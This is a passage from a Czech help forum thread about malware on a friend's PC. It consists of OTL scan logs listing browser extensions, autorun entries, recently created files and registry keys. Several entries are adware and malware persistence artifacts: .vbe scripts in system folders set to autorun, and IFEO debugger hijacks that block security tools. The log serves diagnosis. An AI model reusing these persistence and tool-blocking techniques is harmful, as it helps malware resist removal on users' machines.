FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2014.03.26 00:40:59 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2014\AppData\Roaming\mozilla\Extensions
[2014.07.19 09:15:41 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2014\AppData\Roaming\mozilla\Firefox\Profiles\5yfnke57.default\extensions
[2014.06.20 14:13:29 | 000,000,000 | ---D | M] (Seznam lištička) -- C:\Users\2014\AppData\Roaming\mozilla\Firefox\Profiles\5yfnke57.default\extensions\{ea614400-e918-4741-9a97-7a972ff7c30b}
[2014.06.11 18:15:11 | 000,000,000 | ---D | M] (SafePCRepair) -- C:\Users\2014\AppData\Roaming\mozilla\Firefox\Profiles\5yfnke57.default\extensions\89ffxtbr@SafePCRepair_89.com
[2014.07.13 12:20:56 | 000,000,000 | ---D | M] ("Fast Start") -- C:\Users\2014\AppData\Roaming\mozilla\Firefox\Profiles\5yfnke57.default\extensions\faststartff@gmail.com
[2014.07.09 17:05:03 | 000,000,000 | ---D | M] (CostMin) -- C:\Users\2014\AppData\Roaming\mozilla\Firefox\Profiles\5yfnke57.default\extensions\gvc4haoi@o-gfywm.org
[2014.07.17 17:00:26 | 000,002,664 | ---- | M] () -- C:\Users\2014\AppData\Roaming\mozilla\firefox\profiles\5yfnke57.default\searchplugins\Ask.xml
[2014.07.13 08:42:58 | 000,001,386 | ---- | M] () -- C:\Users\2014\AppData\Roaming\mozilla\firefox\profiles\5yfnke57.default\searchplugins\smartbar.xml
[2014.07.01 20:07:57 | 000,000,643 | ---- | M] () -- C:\Users\2014\AppData\Roaming\mozilla\firefox\profiles\5yfnke57.default\searchplugins\trovi-search.xml
[2014.03.26 00:40:32 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014.03.26 00:40:32 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

O1 HOSTS File: ([2009.06.10 23:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (CostMin) - {56CF0896-99D3-C198-175B-52A3CE5DD65D} - C:\Program Files (x86)\CostMin\hG_.x64.dll ()
O2 - BHO: (IETabPage Class) - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\SupTab\SupTab.dll (Thinknice Co. Limited)
O2 - BHO: (CostMin) - {56CF0896-99D3-C198-175B-52A3CE5DD65D} - C:\Program Files (x86)\CostMin\hG_.dll ()
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [DApp] C:\Program Files\PCDApp\start.bat File not found
O4 - HKLM..\Run: [Luxand Blink!] C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe (Luxand, Inc.)
O4 - HKLM..\Run: [mncgmakaiSrv] C:\Windows\SysWOW64\mncgmakai.vbe ()
O4 - HKLM..\Run: [mncoalkfkSrv] C:\Windows\SysWOW64\mncoalkfk.vbe ()
O4 - HKLM..\Run: [mnconuveSrv] C:\Windows\SysWOW64\mnconuve.vbe ()
O4 - HKLM..\Run: [mncxfeaxpSrv] C:\Windows\inf\mncxfeaxp.vbe ()
O4 - HKLM..\Run: [msrlkwSrv] C:\Windows\inf\msrlkw.vbe ()
O4 - HKLM..\Run: [MSStp] C:\Windows\SysWOW64\msstp.vbe ()
O4 - HKLM..\Run: [SafePCRepair EPM Support] C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\89medint.exe (Mindspark Interactive Network, Inc.)
O4 - HKLM..\Run: [SafePCRepair_89 Browser Plugin Loader 64] C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\89brmon64.exe (VER_COMPANY_NAME)
O4 - HKLM..\Run: [seznam-listicka-distribuce] C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe ()
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [cz.seznam.software.autoupdate] C:\Users\2014\AppData\Roaming\Seznam.cz\szninstall.exe ()
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [cz.seznam.software.szndesktop] C:\Users\2014\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe ()
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [iLivid] C:\Users\2014\AppData\Local\iLivid\iLivid.exe (Bandoo Media Inc.)
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [Newgen] C:\Program Files (x86)\UX Pack\Newgen\Newgen.exe -winstart File not found
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [RocketDock] C:\Program Files (x86)\RocketDock\RocketDock.exe ()
O4 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000..\Run: [uTorrent] C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000\..Trusted Domains: localhost ([]http in Internet)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4D6252F9-CBC6-42CA-84E4-419D4A499ADD}: DhcpNameServer = 213.180.36.130 213.180.36.131
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{DA4E4DB1-9F6B-46A8-87A3-F8AB1EA630C7}: DhcpNameServer = 192.168.1.1
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SupTab\SEARCH~2.DLL) - C:\Program Files (x86)\SupTab\SearchProtect64.dll (Skytech Co., Ltd.)
O20 - AppInit_DLLs: (C:\PROGRA~2\SupTab\SEARCH~1.DLL) - C:\Program Files (x86)\SupTab\SearchProtect32.dll (Skytech Co., Ltd.)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20 - HKU\S-1-5-21-3695167739-365663555-3534380330-1000 Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O27:64bit: - HKLM IFEO\bitguard.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\bprotect.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\bpsvc.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\browserdefender.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\browserprotect.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\browsersafeguard.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\dprotectsvc.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\jumpflip: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\protectedsearch.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\searchinstaller.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\searchprotection.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\searchprotector.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\searchsettings.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\searchsettings64.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\snapdo.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\stinst32.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\stinst64.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\umbrella.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\utiljumpflip.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\volaro: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\vonteera: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\websteroids.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27:64bit: - HKLM IFEO\websteroidsservice.exe: Debugger - C:\Windows\SysNative\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\bitguard.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\bprotect.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\bpsvc.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\browserdefender.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\browserprotect.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\browsersafeguard.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\dprotectsvc.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\jumpflip: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\protectedsearch.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\searchinstaller.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\searchprotection.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\searchprotector.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\searchsettings.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\searchsettings64.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\snapdo.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\stinst32.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\stinst64.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\umbrella.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\utiljumpflip.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\volaro: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\vonteera: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\websteroids.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O27 - HKLM IFEO\websteroidsservice.exe: Debugger - C:\Windows\SysWow64\tasklist.exe (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{3feaec73-b404-11e3-a011-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{3feaec73-b404-11e3-a011-806e6f6e6963}\Shell\AutoRun\command - "" = E:\Autorun.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#5 Příspěvek od neumimvymysletjmeno »

Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.ac3acm - C:\Windows\SysWow64\ac3acm.acm (fccHandler)
Drivers32: msacm.dvacm - C:\Program Files (x86)\Common Files\Ulead Systems\vio\DVACM.acm (Ulead Systems, Inc.)
Drivers32: msacm.l3acm - C:\Windows\SysWow64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.l3codecp - C:\Windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.mpegacm - C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\MPEGACM.acm (Ulead Systems, Inc.)
Drivers32: msacm.ulmp3acm - C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\ulmp3acm.acm (Ulead systems)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: VIDC.FFDS - C:\Windows\SysWow64\ff_vfw.dll ()
Drivers32: VIDC.LAGS - C:\Windows\SysWow64\lagarith.dll ( )
Drivers32: VIDC.X264 - C:\Windows\SysWow64\x264vfw.dll (x264vfw project)
Drivers32: VIDC.XVID - C:\Windows\SysWow64\xvidvfw.dll ()
PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin

========== Files/Folders - Created Within 7 Days ==========

[2014.07.23 17:36:29 | 000,000,000 | ---D | C] -- C:\Program Files\FlatOut2
[2014.07.23 10:41:29 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2014\Desktop\OTL.exe
[2014.07.23 09:51:03 | 000,000,000 | ---D | C] -- C:\Program Files\trend micro
[2014.07.23 09:51:03 | 000,000,000 | ---D | C] -- C:\rsit
[2014.07.23 09:03:32 | 000,000,000 | ---D | C] -- C:\Users\2014\AppData\Roaming\Luxand
[2014.07.23 09:03:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Luxand
[2014.07.23 09:03:13 | 007,942,144 | ---- | C] (Luxand, Inc.) -- C:\Windows\SysNative\LuxandBlinkLib11.dll
[2014.07.23 09:03:13 | 007,942,144 | ---- | C] (Luxand, Inc.) -- C:\Windows\SysNative\LuxandBlinkLib1.dll
[2014.07.23 09:03:10 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Luxand
[2014.07.22 21:22:10 | 000,000,000 | -HSD | C] -- C:\Windows\SysWow64\AI_RecycleBin
[2014.07.22 21:20:02 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Sensible Vision
[2014.07.22 21:18:46 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache
[2014.07.19 14:32:14 | 000,000,000 | ---D | C] -- C:\Users\2014\AppData\Local\Mato_Technologies
[2014.07.19 12:54:55 | 000,000,000 | ---D | C] -- C:\Users\2014\Documents\Nová složka
[2014.07.19 10:58:01 | 000,000,000 | ---D | C] -- C:\files
[2014.07.19 10:31:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NS Folder Locker
[2014.07.19 10:31:28 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Nitin Softwares
[2014.07.19 09:16:56 | 000,000,000 | ---D | C] -- C:\Users\2014\Documents\Projekty
[2014.07.17 18:07:54 | 000,000,000 | ---D | C] -- C:\Users\2014\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer
[2014.07.17 18:07:54 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer
[2014.07.17 17:54:53 | 000,000,000 | ---D | C] -- C:\Users\2014\Desktop\GTA-San-Andreas
[2014.07.17 17:41:42 | 000,000,000 | ---D | C] -- C:\Users\2014\Documents\GTA San Andreas User Files
[2014.07.17 17:00:13 | 000,000,000 | ---D | C] -- C:\Users\2014\AppData\Roaming\FirefoxToolbar
[2014.07.08 17:52:09 | 004,216,840 | ---- | C] (Microsoft Corporation) -- C:\Program Files (x86)\Common Files\vcredist.exe
[5 C:\*.tmp files -> C:\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 7 Days ==========

[2014.07.23 17:44:04 | 000,000,965 | ---- | M] () -- C:\Users\2014\Desktop\FlatOut2.lnk
[2014.07.23 10:45:13 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin
[2014.07.23 10:41:29 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2014\Desktop\OTL.exe
[2014.07.23 10:14:00 | 000,000,914 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014.07.23 09:54:42 | 000,032,144 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014.07.23 09:54:42 | 000,032,144 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014.07.23 09:50:25 | 000,832,273 | ---- | M] () -- C:\Users\2014\Desktop\RSITx64.exe
[2014.07.23 09:47:59 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014.07.23 09:46:54 | 000,000,510 | ---- | M] () -- C:\Users\2014\rgmnr
[2014.07.23 09:45:50 | 000,000,364 | ---- | M] () -- C:\Windows\tasks\AmiUpdXp.job
[2014.07.23 08:52:13 | 3105,288,192 | -HS- | M] () -- C:\hiberfil.sys
[2014.07.22 21:47:56 | 000,476,104 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014.07.21 21:25:06 | 001,582,262 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014.07.21 21:25:06 | 000,668,376 | ---- | M] () -- C:\Windows\SysNative\perfh005.dat
[2014.07.21 21:25:06 | 000,653,724 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014.07.21 21:25:06 | 000,141,004 | ---- | M] () -- C:\Windows\SysNative\perfc005.dat
[2014.07.21 21:25:06 | 000,121,596 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014.07.19 21:41:07 | 000,000,332 | ---- | M] () -- C:\Windows\wininit.ini
[2014.07.19 20:32:45 | 000,000,792 | ---- | M] () -- C:\Users\2014\Desktop\Kobra 11 V Utajení.lnk
[2014.07.19 15:09:29 | 000,001,342 | ---- | M] () -- C:\Users\2014\Desktop\Internet Explorer.lnk
[2014.07.19 10:31:28 | 000,001,255 | ---- | M] () -- C:\Users\Public\Desktop\NS_Folder_Locker.exe.lnk
[2014.07.19 09:16:59 | 000,000,100 | ---- | M] () -- C:\Users\2014\AppData\Roaming\wklnhst.dat
[5 C:\*.tmp files -> C:\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014.07.23 17:42:00 | 000,000,965 | ---- | C] () -- C:\Users\2014\Desktop\FlatOut2.lnk
[2014.07.23 10:45:13 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin
[2014.07.23 09:50:25 | 000,832,273 | ---- | C] () -- C:\Users\2014\Desktop\RSITx64.exe
[2014.07.23 09:03:13 | 001,115,136 | ---- | C] () -- C:\Windows\SysNative\LuxandCredentialProvider.dll
[2014.07.23 09:03:10 | 000,860,160 | ---- | C] () -- C:\Windows\SysNative\LuxandBlink.dll
[2014.07.19 21:41:07 | 000,000,332 | ---- | C] () -- C:\Windows\wininit.ini
[2014.07.19 15:06:40 | 000,001,342 | ---- | C] () -- C:\Users\2014\Desktop\Internet Explorer.lnk
[2014.07.19 10:31:28 | 000,001,255 | ---- | C] () -- C:\Users\Public\Desktop\NS_Folder_Locker.exe.lnk
[2014.07.13 16:39:00 | 000,000,100 | ---- | C] () -- C:\Users\2014\AppData\Roaming\wklnhst.dat
[2014.07.09 09:28:30 | 000,111,104 | ---- | C] () -- C:\Windows\SysWow64\installd.exe
[2014.07.08 17:53:29 | 000,000,406 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014.06.26 15:50:46 | 000,076,288 | ---- | C] () -- C:\Windows\SysWow64\moveex.exe
[2014.06.21 21:52:05 | 000,006,550 | ---- | C] () -- C:\Windows\jautoexp.dat
[2014.06.21 13:02:19 | 000,000,510 | ---- | C] () -- C:\Users\2014\rgmnr
[2014.06.20 15:48:44 | 000,187,904 | --S- | C] () -- C:\Windows\SysWow64\lcpmnconuve.exe
[2014.06.20 15:48:43 | 010,236,928 | --S- | C] () -- C:\Windows\SysWow64\acumnconuve.exe
[2014.06.20 15:48:43 | 000,972,814 | --S- | C] () -- C:\Windows\SysWow64\dcgmnconuve.exe
[2014.06.20 15:39:40 | 000,187,904 | --S- | C] () -- C:\Windows\SysWow64\lcpmncoalkfk.exe
[2014.06.20 15:39:39 | 010,236,928 | --S- | C] () -- C:\Windows\SysWow64\acumncoalkfk.exe
[2014.06.20 15:39:39 | 000,972,814 | --S- | C] () -- C:\Windows\SysWow64\dcgmncoalkfk.exe
[2014.06.11 20:48:48 | 000,925,184 | ---- | C] () -- C:\Windows\expstart.exe
[2014.06.09 18:06:22 | 000,000,003 | ---- | C] () -- C:\Users\2014\stut
[2014.06.09 18:03:25 | 000,000,330 | ---- | C] () -- C:\Users\2014\rgut
[2014.06.09 17:49:12 | 000,972,814 | --S- | C] () -- C:\Windows\SysWow64\dcgmncgmakai.exe
[2014.06.09 17:49:12 | 000,187,904 | --S- | C] () -- C:\Windows\SysWow64\lcpmncgmakai.exe
[2014.06.09 17:49:11 | 010,236,928 | --S- | C] () -- C:\Windows\SysWow64\acumncgmakai.exe
[2014.06.09 17:49:11 | 000,538,126 | --S- | C] () -- C:\Windows\SysWow64\libcurl-4.dll
[2014.06.09 17:49:11 | 000,192,512 | --S- | C] () -- C:\Windows\SysWow64\libidn-11.dll
[2014.06.09 17:49:11 | 000,133,632 | --S- | C] () -- C:\Windows\SysWow64\librtmp.dll
[2014.06.09 17:49:11 | 000,100,864 | --S- | C] () -- C:\Windows\SysWow64\zlib1.dll
[2014.03.26 00:19:04 | 000,151,552 | ---- | C] () -- C:\Windows\KMService.exe
[2014.03.26 00:19:04 | 000,008,192 | ---- | C] () -- C:\Windows\SysWow64\srvany.exe
[2014.03.25 23:41:31 | 000,216,064 | ---- | C] ( ) -- C:\Windows\SysWow64\lagarith.dll
[2014.03.25 23:41:30 | 000,650,752 | ---- | C] () -- C:\Windows\SysWow64\xvidcore.dll
[2014.03.25 23:41:30 | 000,243,200 | ---- | C] () -- C:\Windows\SysWow64\xvidvfw.dll
[2014.03.25 23:41:30 | 000,178,688 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2014.03.25 23:41:28 | 000,112,640 | ---- | C] () -- C:\Windows\SysWow64\ff_vfw.dll
[2014.03.25 18:45:49 | 000,000,000 | ---- | C] () -- C:\Users\2014\regbcm
[2014.03.25 15:45:11 | 001,558,096 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014.03.25 12:19:10 | 000,000,000 | ---- | C] () -- C:\Windows\ativpsrm.bin
[2014.03.25 11:33:57 | 000,003,949 | ---- | C] () -- C:\Windows\SysWow64\atipblag.dat

========== ZeroAccess Check ==========

[2009.07.14 06:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014.03.25 04:43:14 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014.03.25 04:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 03:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010.11.21 05:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 03:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#6 Příspěvek od neumimvymysletjmeno »

========== LOP Check ==========

[2014.07.01 20:09:34 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\AVG
[2014.07.17 17:00:13 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\FirefoxToolbar
[2014.03.26 00:01:08 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\GHISLER
[2014.07.13 09:36:09 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\ImperiaOnline
